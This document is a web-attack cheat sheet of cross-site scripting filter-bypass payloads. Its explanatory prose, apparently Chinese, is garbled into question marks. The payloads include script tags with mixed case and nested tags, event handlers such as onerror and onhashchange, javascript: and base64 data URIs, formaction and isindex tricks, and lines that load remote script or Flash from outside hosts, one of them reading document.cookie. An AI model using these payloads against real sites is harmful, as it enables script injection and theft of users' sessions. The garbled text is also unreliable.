???????????
????1??????????payload??????<b>??<i>??<u>?????????ж???ó??????HTML??????????????????????<>????
????2???????????????????????????payload??<b??<i??<marquee??????????
????3?????????μ?payload
????<script>alert(1);</script>
????<script>prompt(1);</script>
????<script>confirm      (1);</script>
????<script src="http://rhainfosec.com/evil.js">
?????ж?????????????????????Сд??????
????<scRiPt>alert(1);</scrIPt>
????1???????Сд???е????<script>?????????<scr<script>ipt>alert(1)</scr<script>ipt>??
????2?????<a>???????
????<a  href=“http://www.google.com">Clickme</a>
????<a???????
????href???????
??????????????????
?????????й?????????<a href=”javascript:alert(1)”>Clickme</a>
????????????????????????<a href=”rhainfosec.com” onclimbatree=alert(1)>ClickHere</a>
????HTML5???150?????????????????????????????<body/onhashchange=alert(1)><a href=#>clickit
???????????????
????src????

 

<img src=x      onerror=prompt(1);>
<img/src=aaa.jpg      onerror=prompt(1);
<video src=x      onerror=prompt(1);>
<audio src=x      onerror=prompt(1);>
iframe
<iframesrc="javascript:alert(2)">
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;??PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
Embed
<embed/src=//goo.gl/nlX0P>
Action
<form action="Javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=data:text/html?? type=image>
mario???
<formaction=&#039;data:text&sol;html??&lt;script&gt;alert(1)&lt/script&gt&#039;><button>CLICK
“formaction”????
<isindexformaction="javascript:alert(1)"      type=image>
<input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript&colon;alert(1)>CLICKME
“background”????
<table background=javascript:alert(1)></table> // Works on Opera 10.5      and IE6
“posters” ????
<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5
“data”????
<object data="data:text/html;base64??PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object/data=//goo.gl/nlX0P?
“code”????
<applet code="javascript:confirm(document.cookie);"> // Firefox Only
<embed  code="http://businessinfo.co.uk/labs/xss/xss.swf"      allowscriptaccess=always>